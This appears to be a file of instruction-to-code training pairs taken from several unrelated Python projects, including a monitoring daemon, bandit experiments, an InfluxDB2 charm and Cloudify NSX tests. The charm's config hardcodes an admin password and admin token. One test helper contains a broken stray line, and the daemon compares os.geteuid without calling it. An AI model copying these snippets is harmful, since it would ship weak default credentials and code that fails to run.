**self.kwargs) + _register_cleanup(self.process.pid) + self.stdout, self.stderr = self.process.communicate() + self.stdout = self.stdout.decode('utf-8').strip() if self.stdout else '' + self.stderr = self.stderr.decode('utf-8').strip() if self.stderr else '' + self.returncode = self.process.returncode + except Exception as e: + self._exception = e + return e + thread = threading.Thread(target=target) + lg.debug("Executing command: command='%s' %s" + % (self.command, ' '.join('%s=%s' % (a, b) for a, b in self.kwargs.items()))) + time_start = datetime.datetime.now() + thread.start() + if timeout: + thread.join(timeout) + if thread.is_alive(): + signal_ptree(self.process.pid) + thread.join(timeout_sigterm) + if thread.is_alive(): + signal_ptree(self.process.pid, signal=9) + thread.join(timeout_sigkill) + if thread.is_alive(): + _unregister_cleanup(self.process.pid) + raise ThreadDeadlock("Process %s deadlocked thread %s" % (self.process.pid, thread.name)) + _unregister_cleanup(self.process.pid) + raise ExecutionTimeout("Execution timeout after %s seconds" % timeout) + else: + thread.join() + if self._exception: + _unregister_cleanup(self.process.pid) + raise self._exception + lg.debug("Command execution done: time=%s returncode=%s" % + ((datetime.datetime.now() - time_start).seconds, self.returncode)) + _unregister_cleanup(self.process.pid) + return (self.stdout, self.stderr, self.returncode) +[INST] Main entrance +check peers status +check volumes status +try to mount and unmount volume. [/INST] def run(self): + volume = self.plugin.get_param('Volume') + try: + self.check_peers() + except Exception as e: + self.result.add_component('Peers', 'ERROR', error=["Can't check peers: %s" % e]) + lg.exception(e) + try: + self.check_volumes() + except Exception as e: + self.result.add_component('Volumes', 'ERROR', error=["Can't check volumes: %s" % e]) + lg.exception(e) + if volume: + try: + self.mount(volume) + except Exception as e: + self.result.add_component('Mount', 'ERROR', error=["Can't mount volume: %s" % e]) + lg.exception(e) + self.result.set_status() + return self.result +[INST] Check peers status +and add component result. [/INST] def check_peers(self): + peers = self.getPeersStatus() + status = 'OK' + messages = { + 'info' : [], + 'error': [], + 'warn' : [], + } + for host, peer in peers.items(): + if peer['connected'] == True: + messages['info'].append('Peer %s is healthy: %s (Connected)' % (host, peer['status'])) + else: + messages['error'].append('Peer %s is not healthy: %s (Disconnected)' % (host, peer['status'])) + status = 'ERROR' + self.result.add_component('Peers', status, **messages) +[INST] Check volumes status +and add component result. [/INST] def check_volumes(self): + volumes = self.getVolumesStatus() + status = 'OK' + messages = { + 'info' : [], + 'error': [], + 'warn' : [], + } + if len(volumes) < 1: + messages['error'].append("No configured volumes found") + status = 'ERROR' + for vol, nodes in volumes.items(): + if nodes['status'] != 1: + failed = [] + for node, status in nodes.items(): + if node != 'status' and status != 1: + failed.append(node) + messages['error'].append("Volume %s is not healthy (failed nodes: %s)" % (vol, ', '.join(failed))) + status = 'ERROR' + else: + messages['info'].append("Volume %s is healthy" % vol) + self.result.add_component('Volumes', status, **messages) +[INST] Run daemon +change effective uid/gid +start thread for each check +start webserver. [/INST] def run(self): + lg.info("Starting daemon") + if 'uid' in self.conf and 'gid' in self.conf: + if os.geteuid != self.conf['uid'] and os.getegid != self.conf['gid']: + try: + os.setegid(self.conf['gid']) + os.seteuid(self.conf['uid']) + except TypeError as e: + lg.error("Config parameters uid/gid have to be integers: %s" % e) + except OSError as e: + lg.error("Can't switch effective UID/GID to %s/%s: %s" % (self.conf['uid'], self.conf['gid'], e)) + lg.exception(e) + self._shutdown(exitcode=1) + else: + lg.info("Not changing effective UID/GID, keeping %s/%s" % (os.geteuid(), os.getegid())) + if not isinstance(self.conf['bind_port'], int): + lg.error("Config parameter bind_port has to be integer") + config = {} + for key in ['plugins', 'templates', 'actions']: + try: + config[key] = self.conf[key] + except KeyError as e: + lg.warn("Config section not found: %s" % e) + if not config['plugins']: + lg.error('No configured plugins') + self._shutdown(exitcode=1) + if 'nr_concurrent_plugins' in self.conf: + config['semaphore_count'] = self.conf['nr_concurrent_plugins'] + try: + self.pluginmgr = PluginManager(**config) + except Exception as e: + lg.error("Can't initialize PluginManager") + lg.exception(e) + self._shutdown(exitcode=1) + lg.info("Starting webserver on %(bind_host)s:%(bind_port)s" + % self.conf) + try: + self.server = RestServer(self) + self.server.start() + except Exception as e: + lg.error("Can't start HTTP server: %s" % e) + lg.exception(e) + self._shutdown(exitcode=1) + if hasattr(signal, 'SIGINT'): + signal.signal(signal.SIGINT, self._shutdown) + if hasattr(signal, 'SIGTERM'): + signal.signal(signal.SIGTERM, self._shutdown) + if hasattr(signal, 'SIGHUP'): + signal.signal(signal.SIGHUP, self._reopen_logfiles) + self._watchdog() +[INST] Daemonize and run daemon +Use double-fork magic to do that + +Use sys.exit() here instead of self._shutdown() because we don't have running +daemon to shutdown in this function. [/INST] def daemonize(self): + if os.path.isfile(self.conf['pidfile']): + lg.error("PID file %s already exists" % self.conf['pidfile']) + sys.exit(1) + pid = os.fork() + if pid: + sys.exit(0) + os.chdir('/') + os.setsid() + os.umask(0) + pid = os.fork() + if pid: + sys.exit(0) + for log in ['stdout', 'stderr', 'stdin']: + path = os.path.dirname(self.conf[log]) + if not os.path.exists(path): + os.mkdir(path) + redirect_standard_io(self.conf) + try: + fh = open(self.conf['pidfile'], 'w') + fh.write(str(os.getpid())) + fh.flush() + fh.close() + except Exception as e: + lg.error("Can't write PID into pidfile: %s" % e) + sys.exit(1) + try: + self.run() + except Exception as e: + self._shutdown(exitcode=1) + lg.exception(e) +[INST] Shutdown smoker daemon (internal use) +exitcode - exit code number (default 0) +signum, frame - used by signal handler +exception - if True, raise on exception, otherwise just log it and pass. [/INST] def _shutdown(self, signum=None, frame=None, exitcode=0, exception=False): + if self.pluginmgr and self.pluginmgr.stopping: + return + lg.info("Shutting down") + try: + if self.server: + try: + self.server.terminate() + self.server.join() + except AttributeError: + pass + if self.pluginmgr: + self.pluginmgr.stop() + if os.path.isfile(self.conf['pidfile']): + os.remove(self.conf['pidfile']) + except Exception as e: + lg.exception(e) + if exception: + raise + sys.exit(exitcode) +[INST] Get client configuration from smokercli.yaml. [/INST] def _load_config(): + conf_file = os.path.expanduser('~/.smokercli.yaml') + if not os.path.exists(conf_file): + conf_file = CONFIG_FILE + if not os.path.exists(conf_file): + return None + with open(conf_file) as f: + config = yaml.safe_load(f) + return config +[INST] Get list of available host discovery plugin module names. [/INST] def _get_plugins(config): + plugins = [] + if config and 'plugin_paths' in config: + paths = config['plugin_paths'] + else: + raise Exception('Invalid config file') + for path in paths: + try: + module = __import__(path) + except ImportError: + raise Exception('Invalid config file') + toplevel = os.path.dirname(module.__file__) + submodule = '/'.join(path.split('.')[1:]) + plugin_dir = os.path.join(toplevel, submodule, '*.py') + modules = [os.path.basename(name)[:-3] for name in + glob.glob(plugin_dir)] + modules.remove('__init__') + plugins += ['%s.%s' % (path, name) for name in modules] + return plugins +[INST] Add host discovery plugin specific options to the cmdline argument parser. [/INST] def _add_plugin_arguments(parser, config): + plugins = _get_plugins(config) + if not plugins: + return + argument_group = parser.add_argument_group('Plugin arguments') + for plugin in plugins: + args = _get_plugin_arguments(plugin) + for argument in args: + argument_group.add_argument(*argument.args, **argument.kwargs) +[INST] Dump plugins result to TAP +Take OK and also WARN statuses as ok +Print only error and warn results. [/INST] def dump_tap(plugins): + tap = Tap() + for name in sorted(plugins): + host = plugins[name] + if host['status'] in ['OK', 'WARN']: + host_ok = True + else: + host_ok = False + tap_host = TapTest(name, host_ok) + tap.add_test(tap_host) + for key in sorted(host['plugins']): + plugin = host['plugins'][key] + if not plugin['lastResult']: + plugin_ok = False + else: + if plugin['lastResult']['status'] in ['OK', 'WARN']: + plugin_ok = True + else: + plugin_ok = False + messages = [] + if plugin['lastResult']: + if plugin['lastResult']['messages']: + messages = plugin['lastResult']['messages'] + tap_plugin = TapTest(plugin['name'], plugin_ok, messages) + tap_host.add_subtest(tap_plugin) + if (plugin['lastResult'] and + plugin['lastResult']['componentResults']): + for component in plugin['lastResult']['componentResults']: + component = component['componentResult'] + if component['status'] in ['OK', 'WARN']: + component_ok = True + else: + component_ok = False + messages = [] + if component['messages']: + if component['messages']: + messages = component['messages'] + tap_component = TapTest(component['name'], component_ok, + messages) + tap_plugin.add_subtest(tap_component) + return tap.dump() +[INST] Add count of items as done. [/INST] def add_done(self, count=1): + assert isinstance(count, numbers.Integral), "Count must be integral number" + self.items_done += count +[INST] Run thread +While we have undone items, print progressbar. [/INST] def run(self): + while self.items_done < self.items_count: + try: + width, height = console.get_terminal_size() + except IOError: + width, height = (80, 37) + sys.stdout.write('\r%s' % (width * ' ')) + sys.stdout.write('\r %s' % self.get_progress()) + sys.stdout.flush() + time.sleep(self.speed) +[INST] This function has to be called after progress bar stop to do the cleanup. [/INST] def stop(self): + print() +[INST] Accept list pool of threads, watch if they are alive and update progress. [/INST] def wait_pool(self, pool): + assert isinstance(pool, list), "Parameter pool must be list of Thread objects" + while self.get_left(): + done = 0 + for t in pool: + assert isinstance(t, threading.Thread),\ + "Object in pool must be instance of threading.Thread not %s" % type(t) + if not t.is_alive(): + done += 1 + self.set_done(done) + time.sleep(1) +[INST] Check if plugin passes supplied filters. [/INST] def _match_filters(self, plugin, filters, negative=False, exclude_plugins=None): + if exclude_plugins: + if plugin['name'] in exclude_plugins: + return False + match_result = lambda match: not match if negative else match + match = True + for filter in filters: + if isinstance(filter, tuple): + key, value = filter + if key == 'status' and isinstance(value, list): + try: + if plugin['lastResult']['status'] in value: + match = True + if not negative: continue + else: break + else: + match = False + break + except (KeyError, TypeError): + if 'UNKNOWN' in value: + match = True + if not negative: continue + else: break + else: + match = False + break + elif isinstance(filter, dict): + try: + if plugin['parameters'][filter['key']] == filter['value']: + lg.debug("Plugin %s matched filter %s = %s" % (plugin['name'], filter['key'], filter['value'])) + match = True + if not negative: continue + else: break + else: + lg.debug("Plugin %s doesn't match filter %s = %s" % (plugin['name'], filter['key'], filter['value'])) + match = False + break + except KeyError: + lg.debug("Plugin %s doesn't have filter parameter %s" % (plugin['name'], filter['key'])) + match = False + break + elif isinstance(filter, list): + if plugin['name'] in filter: + lg.debug("Plugin %s matched requested plugins list" % plugin['name']) + match = True + continue + else: + match = False + lg.debug("Plugin %s doesn't match requested plugins list" % plugin['name']) + break + match = match_result(match) + return match +[INST] Open given uri in parallel and +get JSON-parsed result. [/INST] def open(self, uri=None, resource=None, data=None): + if not uri and not resource: + raise Exception("Argument uri or resource have to be submitted") + pool = [] + for host in self.hosts: + t = threading.Thread(name=host.name, target=host.open, args=(uri, resource, data,)) + t.daemon = True + t.start() + pool.append(t) + self.wait(pool) + result = {} + for host in self.hosts: + result[host.name] = host.get_result() + return result +[INST] Wait until all threads in pool are done. [/INST] def wait(self, pool): + done = False + while not done: + done = True + for t in pool: + if t.is_alive(): + done = False + time.sleep(0.5) +[INST] Wait until all threads in pool are done +and show nice progress bar. [/INST] def wait_progress(self, pool): + try: + with ProgressBar(len(pool)) as progress: + progress.wait_pool(pool) + except NonInteractiveError as e: + lg.warn(e) + self.wait(pool) +[INST] Open given uri and get JSON-parsed result. [/INST] def open(self, uri=None, resource=None, data=None, timeout=20): + if not uri and not resource: + raise Exception("Argument uri or resource have to be submitted") + if resource: + try: + uri = self.links[resource]['href'] + except KeyError: + lg.error("Can't find resource %s" % resource) + return False + if data: + data = data.encode('utf-8') + url = '%s%s' % (self.url, uri) + lg.info("Host %s: requesting url %s" % (self.name, url)) + try: + fh = urllib.request.urlopen(url, timeout=timeout, data=data) + except Exception as e: + lg.error("Host %s: can't open resource %s: %s" % (self.name, url, e)) + return False + fh = fh.read() + if not _PY3: + fh = fh.decode('utf-8') + try: + json = simplejson.loads(fh) + except Exception as e: + lg.error("Host %s: can't load response as JSON: %s" % (self.name, e)) + return False + self._result = json + return json +[INST] Force plugin run +Poll process until result. [/INST] def force_run(self, plugins): + plugins_list = list(plugins.keys()) + data = simplejson.dumps({ + 'process' : { + 'plugins' : plugins_list, + } + }) + lg.info("Forcing run of %d plugins on host %s" % (len(plugins_list), self.name)) + process = self.open(resource='processes', data=data) + if process: + poll = process['asyncTask']['link']['poll'] + return self.poll(uri=poll) + else: + return False +[INST] Print number of hosts in result. [/INST] def count_hosts(self): + return len(self) +[INST] Dump all tests into tap structure. [/INST] def dump(self): + dump = [] + dump.append('1..%s' % len(self.tests)) + for test in self.tests: + dump.append(test.dump()) + return '\n'.join(dump) +[INST] Add TapTest instance as subtest +Return subtest index. [/INST] def add_subtest(self, test): + test.index = self.subtests_index + self.subtests.append(test) + self.subtests_index += 1 + return test.index +[INST] Dump TapTest result into TAP +Should be used from Tap instance to dump all results + +Dump messages in YAMLish format. [/INST] def dump(self): + dump = [] + dump.append('%s %s - %s' % (self.status, self.index, self.name)) + if self.messages: + messages = [] + for key, values in self.messages.items(): + if values: + messages.append('\t- %s:' % key) + for msg in values: + messages.append("\t\t- %s" % msg) + if messages: + messages.insert(0, '---') + messages.append('...') + dump.append('\n'.join(messages)) + if self.subtests: + dump_subtests = [] + dump_subtests.append('\t1..%s' % len(self.subtests)) + for test in self.subtests: + dump_subtests.append(test.dump()) + dump.append(re.sub('\n', '\n\t', '\n'.join(dump_subtests))) + return '\n'.join(dump) +[INST] Match value with defined template field.. [/INST] def m_eq(value, templ_value): + retMatch = None + retBoundName = None + m_t = m_regex.match(templ_value) + if m_t: + gd = m_t.groupdict() + if gd.get('bound'): + retBoundName = gd['bound'] + retMatch = True + if gd.get('re_bound'): + retMatch = re.match(gd['re_bound'], value) + if gd.get('re'): + retMatch = re.match(gd['re'], value) + if gd.get('re_bound_neg'): + retMatch = not re.match(gd['re_bound_neg'], value) + if gd.get('re_neg'): + retMatch = not re.match(gd['re_neg'], value) + if gd.get('type'): + retMatch = isinstance(value, m_get_type(gd['type'])) + if gd.get('literal'): + retMatch = value == gd['literal'] + if gd.get('normal'): + retMatch = value == gd['normal'] + return retMatch, retBoundName +[INST] Will return proper instance of namedtuple (all named Row).. [/INST] def row_tuple(fields_str, additional_fields=None): + def mk__getattr__(additional_fields): + def _attr_f(t, self, name): + if t and name in t: + return string.Template(t[name]).safe_substitute(**self._asdict()) + return None + return lambda self, name: _attr_f(additional_fields, self, name) + if fields_str not in _tuple_cache: + Row = collections.namedtuple('Row', fields_str) + Row.__getattr__ = mk__getattr__(additional_fields=additional_fields) + Row.__str = Row.__str__ + Row.__str__ = lambda t: ( + '|<| ' + + ' | '.join('%s: %s' % (f, getattr(t, f)) for f in t._fields) + + ' |>|') + _tuple_cache[fields_str] = Row + return _tuple_cache[fields_str] +[INST] Extend attribute of `Row` namedtuple. +Return `None` on invalid field. +Return formatted string when name is in TEMPLATE dictionary.. [/INST] def mk__getattr__(additional_fields): + def _attr_f(t, self, name): + if t and name in t: + return string.Template(t[name]).safe_substitute(**self._asdict()) + return None + return lambda self, name: _attr_f(additional_fields, self, name) +[INST] Object is iterable but not string.. [/INST] def is_iterable(s): + if isinstance(s, (str, bytes)): + return False + return hasattr(s, '__iter__') +[INST] Make sure dictionary and/or list iterate with same protocol.. [/INST] def iter_tuplepairs(structure): + if isinstance(structure, (str, bytes)): + return tuple() + elif isinstance(structure, collections.Mapping): + return iteritems(structure) + elif isinstance(structure, collections.Sequence) or is_iterable(structure): + return enumerate(structure) + else: + return tuple() +[INST] Integral type is only type that this function can verify. +But it's okay, don't really need more types.. [/INST] def m_get_type(val): + tp = ''.join(val.split('!')) + if tp == 'Integral': + import numbers + return numbers.Integral + return None +[INST] Step down the template dict to the proper sub-branch.. [/INST] def delve_in_template(templ, name, value): + if name is not None: + return templ['$' + name] + elif value in templ: + return templ[value] + types = list(filter(lambda x: x.startswith('!'), + iter(templ.keys()))) + for t in types: + if isinstance(value, m_get_type(t)): + return templ[t] + raise IndexError("(VALUE: %s) or (PATTERN: %s) not in '%s'" % (value, name, templ)) +[INST] Decision predicate if current captured fields satisfy matching rules and can delve further.. [/INST] def m_field_dicts(data_fields, templ): + def fields_only(d): + flds = {} + for field_candidate, value in d.items(): + if is_scalar(value): + flds[field_candidate] = value + return flds + def satisfy_fields(d, t): + retVal = tuple() + template_fields = fields_only(t) + plain_fields = list(itertools.filterfalse(lambda s: s.startswith('$'), + iter(template_fields.keys()))) + if set(d.keys()).issuperset(set(plain_fields)): + for f in plain_fields: + match, bound_name = m_eq(d[f], t[f]) + if not match: + return None, tuple() + if bound_name: + retVal = retVal + ((bound_name, d[f]),) + return True, retVal + return None, tuple() + return satisfy_fields(data_fields, templ) +[INST] Reinitialize bandit for a new run when running in serial or parallel. [/INST] def initialization(self, testbed): + testbed.reset_ev() + self.n = 1 + self.Q = deepcopy(self.Q_init) + self.Na = {a: 0 for a in self.Q} + self.At = self.argmax(self.Q) +[INST] Return max estimate Q, if tie between actions, choose at random between tied actions. [/INST] def argmax(self, Q): + Q_array = np.array(list(self.Q.values())) + At = np.argwhere(Q_array == np.max(Q_array)).flatten().tolist() + if len(At) > 1: + At = np.random.choice(At) + else: + At = At[0] + return list(Q.keys())[At] +[INST] Run bandit for specified number of steps and optionally multiple runs. [/INST] def run(self, testbed, steps, n_runs=1, n_jobs=4, serial=False): + if serial: + self.action_values = self._serialrun(testbed, steps, n_runs) + elif n_runs >= 4: + if n_jobs > cpu_count(): + warnings.warn( + f"Warning: running n_jobs: {n_jobs}, with only {cpu_count()} cpu's detected", + RuntimeWarning, + ) + self.action_values = self._multirun(testbed, steps, n_runs, n_jobs=n_jobs) + else: + self.action_values = self._serialrun(testbed, steps, n_runs) +[INST] Reshape action_values numpy array and output as pandas dataframe. [/INST] def output_df(self): + n_rows = self.action_values.shape[2] * self.action_values.shape[0] + df = pd.DataFrame( + data=self.action_values.transpose(2, 0, 1).reshape(-1, len(self.columns)), + columns=self.columns, + ) + return df +[INST] Reshape action_values numpy array and output as pandas dataframe +Add epsilon coefficient used for greedy bandit. [/INST] def output_df(self): + df = super().output_df() + df["epsilon"] = self.epsilon + return df +[INST] Reinitialize bandit attributes for a new run. [/INST] def initialization(self, testbed): + testbed.reset_ev() + self.n = 1 + self.Q = deepcopy(self.Q_init) + self.Na = {a: 1e-100 for a in self.Na} +[INST] Reshape action_values numpy array and output as pandas dataframe +Add c coefficient used for UCL. [/INST] def output_df(self): + df = super().output_df() + df["c"] = self.c + return df +[INST] Reinitialize bandit attributes for a new run. [/INST] def initialization(self, testbed): + testbed.reset_ev() + self.n = 1 + self.H = deepcopy(self.Q_init) + self.Q = deepcopy(self.Q_init) + self.Na = {a: 0 for a in self.Q} +[INST] Reshape action_values numpy array and output as pandas dataframe +Add learning rate. [/INST] def output_df(self): + df = super().output_df() + df["lr"] = self.lr + return df +[INST] Average all dataframe columns across runs. [/INST] def average_runs(df, group=[]): + return df.groupby(["step"] + group).mean().reset_index() +[INST] Write scalars to local using aim +Return +Value of last step. [/INST] def write_scalars(df, session, column: str, tag: str, hp: dict): + df = average_runs(df) + df.apply( + lambda x: session.track( + x[column], + epoch=int(x.step), + name=tag, + ), + axis=1, + ) + return df[column].iloc[-1] +[INST] Provide an estimate of the testbed values across all arms +n (int): Number of iterations to execute in testbed. [/INST] def estimate_distribution(self, n=1000) -> pd.DataFrame: + self.p_drift = 0.0 + R = pd.DataFrame(columns=["reward", "action", "strategy"]) + for a in self.expected_values: + Ra = pd.DataFrame(self.action_value(a, shape=(n, 1)), columns=["reward"]) + Ra["action"] = a + Ra["strategy"] = "uniform" + R = pd.concat([R, Ra]) + if self.initial_ev != self.expected_values: + self.expected_values = deepcopy(self.initial_ev) + for a in self.initial_ev: + Ra = pd.DataFrame(self.action_value(a, shape=(n, 1)), columns=["reward"]) + Ra["action"] = a + Ra["strategy"] = "uniform" + R = pd.concat([R, Ra]) + return R +[INST] Return true best action that should have been taken based on EV state. [/INST] def best_action(self): + A_best = list(self.expected_values.keys())[ + np.argmax([ev["mean"] for ev in self.expected_values.values()]) + ] + return A_best +[INST] Handle the pebble_ready event for the influxdb2 container.. [/INST] def _on_config_changed(self, event: HookEvent) -> None: + container = self.unit.get_container(WORKLOAD_CONTAINER) + try: + plan = container.get_plan().to_dict() + except (APIError, ConnectionError) as error: + logger.debug(f"The Pebble API is not ready yet. Error message: {error}") + event.defer() + return + logger.debug(f"[*] container plan => {plan}") + pebble_config = Layer(raw=self._influxdb2_layer()) + if plan.get("services", {}) == pebble_config.to_dict()["services"]: + logger.debug("Pebble plan has already been loaded. No need to update the config.") + return + try: + container.add_layer("influxdb2", pebble_config, combine=True) + except (APIError, ConnectionError) as error: + logger.debug(f"The Pebble API is not ready yet. Error message: {error}") + event.defer() + return + if self._is_running(container, WORKLOAD_CONTAINER): + container.stop(WORKLOAD_CONTAINER) + container.start(WORKLOAD_CONTAINER) + self.unit.status = ActiveStatus("Pod is ready") +[INST] Provide Grafana with data source information.. [/INST] def _on_grafana_source_relation_changed(self, event: RelationEvent) -> None: + if not self.model.unit.is_leader(): + return + relation_data = { + "private-address": subprocess.check_output(["unit-get", "private-address"]) + .decode() + .strip(), + "port": "8086", + "source-type": "influxdb", + } + event.relation.data[self.unit].update(relation_data) +[INST] Returns initial Pebble configuration layer for Influxdb2.. [/INST] def _influxdb2_layer(self) -> dict: + return { + "summary": "influxdb2 layer", + "description": "pebble config layer for influxdb2", + "services": { + "influxdb2": { + "override": "replace", + "summary": "influxdb2 service", + "command": "/entrypoint.sh influxd", + "startup": "enabled", + "environment": { + "DOCKER_INFLUXDB_INIT_MODE": "setup", + "DOCKER_INFLUXDB_INIT_USERNAME": "admin", + "DOCKER_INFLUXDB_INIT_PASSWORD": "thisisatest123", + "DOCKER_INFLUXDB_INIT_ORG": "influxdata", + "DOCKER_INFLUXDB_INIT_BUCKET": "default", + "DOCKER_INFLUXDB_INIT_RETENTION": "0s", + "DOCKER_INFLUXDB_INIT_ADMIN_TOKEN": "asdfasdfasdf", + "INFLUXD_BOLT_PATH": "/var/lib/influxdbv2/influxd.bolt", + "INFLUXD_ENGINE_PATH": "/var/lib/influxdbv2", + "INFLUXD_HTTP_BIND_ADDRESS": ":8086", + }, + } + }, + } +[INST] Helper method to determine if a given service is running in a given container. [/INST] def _is_running(self, container: Container, service: str) -> bool: + try: + svc = container.get_service(service) + return svc.current == ServiceStatus.ACTIVE + except ModelError: + return False +[INST] Delete firewall rule, as resource_id used response +from add_firewall_rule. [/INST] def delete_firewall_rule(client_session, resource_id): + try: + esg_id, rule_id = resource_id.split("|") + except Exception as ex: + raise cfy_exc.NonRecoverableError( + 'Unexpected error retrieving resource ID: %s' % str(ex) + ) + result = client_session.delete( + 'firewallRule', uri_parameters={ + 'edgeId': esg_id, 'ruleId': rule_id + }) + common.check_raw_result(result) +[INST] common function with any call from clint_session. [/INST] def _common_uninstall_external_and_unintialized( + self, resource_id, func_call, func_kwargs, additional_params=None + ): + kwargs = self._kwargs_regen(func_kwargs) + self.fake_ctx.instance.runtime_properties['resource_id'] = None + if additional_params: + for i in additional_params: + self.fake_ctx.instance.runtime_properties[i] = i + func_call(**kwargs) + self.assertEqual(self.fake_ctx.instance.runtime_properties, {}) + kwargs = self._kwargs_regen(func_kwargs) + self.fake_ctx.instance.runtime_properties['resource_id'] = resource_id + self.fake_ctx.node.properties['use_external_resource'] = True + if additional_params: + for i in additional_params: + self.fake_ctx.instance.runtime_properties[i] = i + func_call(**kwargs) + self.assertEqual(self.fake_ctx.instance.runtime_properties, {}) + if resource_id.find('|') >= 0: + new_resource_id = resource_id + "|_" + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + new_resource_id, func_kwargs + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + with self.assertRaises(cfy_exc.NonRecoverableError) as error: + func_call(**kwargs) + self.assertTrue(str(error.exception).find( + 'Unexpected error retrieving resource ID' + ) == 0) + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + resource_id, func_kwargs + ) + if additional_params: + for i in additional_params: + self.fake_ctx.instance.runtime_properties[i] = i + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + with self.assertRaises(cfy_exc.NonRecoverableError): + func_call(**kwargs) + fake_client.assert_called_with( + 'raml', 'host', 'username', 'password' + ) + runtime = self.fake_ctx.instance.runtime_properties + self.assertEqual(runtime['resource_id'], resource_id) + self.assertEqual( + runtime['nsx_auth'], { + 'username': 'username', + 'password': 'password', + 'host': 'host', + 'raml': 'raml' + } + ) + if additional_params: + for i in additional_params: + self.assertEqual(runtime.get(i), i) +[INST] check that we have RecoverableError with empty properties. [/INST] def _common_run_relationship(self, func): + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + None, {}, False + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + with self.assertRaises(cfy_exc.NonRecoverableError): + func(**kwargs) +[INST] Check skip install logic if we have use_existing and don't have +additional checks inside. [/INST] def _common_use_existing_without_run(self, resource_id, func_call, + func_kwargs): + kwargs = self._kwargs_regen(func_kwargs) + kwargs['use_external_resource'] = True + kwargs['resource_id'] = resource_id + func_call(**kwargs) + self.assertTrue( + self.fake_ctx.instance.runtime_properties['use_external_resource'] + ) +[INST] Check skip install logic if we have resource_id +or have issues with session. [/INST] def _common_install(self, resource_id, func_call, func_kwargs, + relationships=None): + kwargs = self._kwargs_regen(func_kwargs) + self.fake_ctx.instance.runtime_properties['resource_id'] = resource_id + if relationships: + self.fake_ctx.instance.relationships = relationships + func_call(**kwargs) + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + None, func_kwargs + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + if relationships: + self.fake_ctx.instance.relationships = relationships + with self.assertRaises(cfy_exc.NonRecoverableError): + func_call(**kwargs) + fake_client.assert_called_with( + 'raml', 'host', 'username', 'password' + ) + runtime = self.fake_ctx.instance.runtime_properties + self.assertFalse('resource_id' in runtime) + self.assertEqual( + runtime['nsx_auth'], { + 'username': 'username', + 'password': 'password', + 'host': 'host', + 'raml': 'raml' + } + ) +[INST] check install logic that read/extract current state and than send +update request. [/INST] def _common_install_extract_or_read_and_update( + self, resource_id, func_call, func_kwargs, + extract_args=None, extract_kwargs=None, extract_response=None, + read_args=None, read_kwargs=None, read_response=None, + create_args=None, create_kwargs=None, create_response=None, + update_args=None, update_kwargs=None, update_response=None, + relationships=None + ): + self._common_install(resource_id, func_call, func_kwargs, + relationships=relationships) + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + None, func_kwargs + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + self._update_fake_cs_result( + fake_cs_result, + extract_response=extract_response, + read_response=read_response, + create_response=create_response, + update_response=update_response + ) + if relationships: + self.fake_ctx.instance.relationships = relationships + func_call(**kwargs) + self._check_fake_cs_result( + fake_cs_result, + extract_response=extract_response, + extract_args=extract_args, extract_kwargs=extract_kwargs, + read_response=read_response, + read_args=read_args, read_kwargs=read_kwargs, + create_response=create_response, + create_args=create_args, create_kwargs=create_kwargs, + update_response=update_response, + update_args=update_args, update_kwargs=update_kwargs + ) + runtime = self.fake_ctx.instance.runtime_properties + self.assertEqual( + runtime['resource_id'], + resource_id + ) +[INST] check install logic run create only. [/INST] def _common_install_create( + self, resource_id, func_call, func_kwargs, + create_args, create_kwargs, create_response + ): + self._common_install(resource_id, func_call, func_kwargs) + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + None, func_kwargs + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + self._update_fake_cs_result( + fake_cs_result, + create_response=create_response + ) + func_call(**kwargs) + self._check_fake_cs_result( + fake_cs_result, + create_response=create_response, + create_args=create_args, create_kwargs=create_kwargs + ) + runtime = self.fake_ctx.instance.runtime_properties + self.assertEqual( + runtime['resource_id'], + resource_id + ) +[INST] check install logic that check 'existing' by read +and than run create. [/INST] def _common_install_read_and_create( + self, resource_id, func_call, func_kwargs, read_args, read_kwargs, + read_response, create_args, create_kwargs, create_response, + recheck_runtime=None + ): + self._common_install(resource_id, func_call, func_kwargs) + if read_response: + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + None, func_kwargs + ) + self.fake_ctx.node.properties['use_external_resource'] = True + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + self._update_fake_cs_result( + fake_cs_result, + read_response=read_response + ) + func_call(**kwargs) + self._check_fake_cs_result( + fake_cs_result, + read_response=read_response, + read_args=read_args, read_kwargs=read_kwargs, + ) + runtime = self.fake_ctx.instance.runtime_properties + self.assertEqual( + runtime['resource_id'], resource_id + ) + if recheck_runtime: + for field in recheck_runtime: + self.assertEqual( + runtime[field], + recheck_runtime[field] + ) + , but empty response + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + None, func_kwargs + ) + self.fake_ctx.node.properties['use_external_resource'] = True + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + self._update_fake_cs_result( + fake_cs_result, + read_response=SUCCESS_RESPONSE + ) + with self.assertRaises(cfy_exc.NonRecoverableError): + func_call(**kwargs) + self._check_fake_cs_result( + fake_cs_result, + read_response=read_response, + read_args=read_args, read_kwargs=read_kwargs, + ) + self.assertFalse( + 'resource_id' in self.fake_ctx.instance.runtime_properties + ) + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + None, func_kwargs + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + self._update_fake_cs_result( + fake_cs_result, + read_response=read_response + ) + with self.assertRaises(cfy_exc.NonRecoverableError): + func_call(**kwargs) + self._check_fake_cs_result( + fake_cs_result, + read_response=read_response, + read_args=read_args, read_kwargs=read_kwargs, + ) + self.assertFalse( + 'resource_id' in self.fake_ctx.instance.runtime_properties + ) + fake_client, fake_cs_result, kwargs = self._kwargs_regen_client( + None, func_kwargs + ) + with mock.patch( + 'cloudify_nsx.library.nsx_common.NsxClient', + fake_client + ): + self._update_fake_cs_result( + fake_cs_result, + 